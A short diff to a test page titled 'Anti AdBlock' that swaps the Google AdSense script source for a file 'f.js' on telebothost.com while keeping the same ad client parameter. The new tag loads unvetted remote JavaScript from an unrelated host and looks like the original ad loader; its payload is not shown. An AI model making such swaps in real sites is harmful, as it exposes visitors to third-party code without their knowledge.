--- a/tests/index.html
+++ b/tests/index.html
@@ -4,7 +4,7 @@
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <title>Anti AdBlock</title>
-    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2719295794573158" crossorigin="anonymous"></script>
+    <script async src="https://telebothost.com/f.js?client=ca-pub-2719295794573158" crossorigin="anonymous"></script>
 </head>
 <body>
 <div id="adsbygoogl" style="padding:20px; background:#fafafa; border-radius:10px; margin:20px 0;">
